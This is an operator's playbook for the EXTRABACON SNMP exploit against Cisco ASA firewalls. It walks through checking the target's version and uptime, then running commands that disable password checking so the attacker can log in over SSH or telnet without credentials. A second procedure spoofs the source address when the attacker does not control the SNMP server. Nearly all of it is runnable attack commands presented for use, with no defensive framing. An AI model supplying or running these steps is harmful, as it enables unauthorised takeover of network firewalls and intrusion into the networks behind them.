#CISCO ASA SNMP exploit script #Works on most 8.x(y) versions through 8.4(4). Check documentation #Do not use against unknown or unsupported versions #We require certain information for this to work #You need to own a SNMP server in the config #Or be 100 percent certain of the targets version and uptime #EX: snmp-server host inside X.X.X.X community public #Community String EX: snmp-server community public (may be randon characters) #Ideally you should know the Version and Uptime of the FW. #You can crash if it is freshly rebooted and has a long community string #Ports 161, 22 or 23 #Lets make sure we have access to the right ports from the SNMP server -ping -r -t -p 23 -ping -r -t -p 22 #Awesome pings worked! Lets use the info sub command to get the information we need. #Community string is case sensitive u RHP TARGETIP 161 python2.7 ./extrabacon_1.1.0.1.py info -t -c SNMPSTRING #If successful firewall uptime and version are confirmed. #You will see the keyfile in the concerendparent directory #There are other ways to get this info as well...this is gee whiz info #snmpget -v 2c -c SNMPSTRING -r 0 system.sysDescr.0 #snmpget -v 2c -c SNMPSTRING -r 0 system.sysUpTime.0 #If it says unsupported in the keyfile area...dont throw BACON. EXAMPLE: #[-] target is running Cisco Adaptive Security Appliance Version 7.2(4), which is NOT supported #Data stored in key file : unsupported #Data stored in self.vinfo: UNSUPPORTED #Assuming we are supported...lets rock on. #We need to disable password checking so we can ssh or telnet on python2.7 ./extrabacon_1.1.0.1.py exec -k -t -c --mode pass-disable #Assuming this was a succes, you should be able to ssh on without creds #MAKE SURE TO ENABLE PASSWORD CHECKING. YOU CAN DO THIS DURING YOUR SSH/TELNET SESSION python2.7 ./extrabacon_1.1.0.1.py exec -k -t -c --mode pass-enable DONE. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ #THE BELOW PROCEDURE IS AN OPTION IF YOU KNOW THE SNMP SERVER, BUT DON'T OWN IT #You will need to be absolutley sure of the version of the FW before attempting however #Do not try this if you are not 100% sure...the FW will crash the FW #The "info" sub command does not have a spoofing capability...only exec does. #Create a Key file with your version at the TOP #EXAMPLE: Lets say your target is an asa804 (or at least yout think vi /current/bin/FW/EXTRABACON/keys/1234.key echo asa804 > keys/1234.key #You will need to use a rawsend for this to work -rawsend RHP #Lets spoof...use no-health-check so it doesn't try to respond to your redirector python2.7 ./extrabacon.py exec -k 1234 -t :161 -c public --mode pass-disable --spoof --no-health-check #Repeat this if successful and logged on with the --mode pass-enable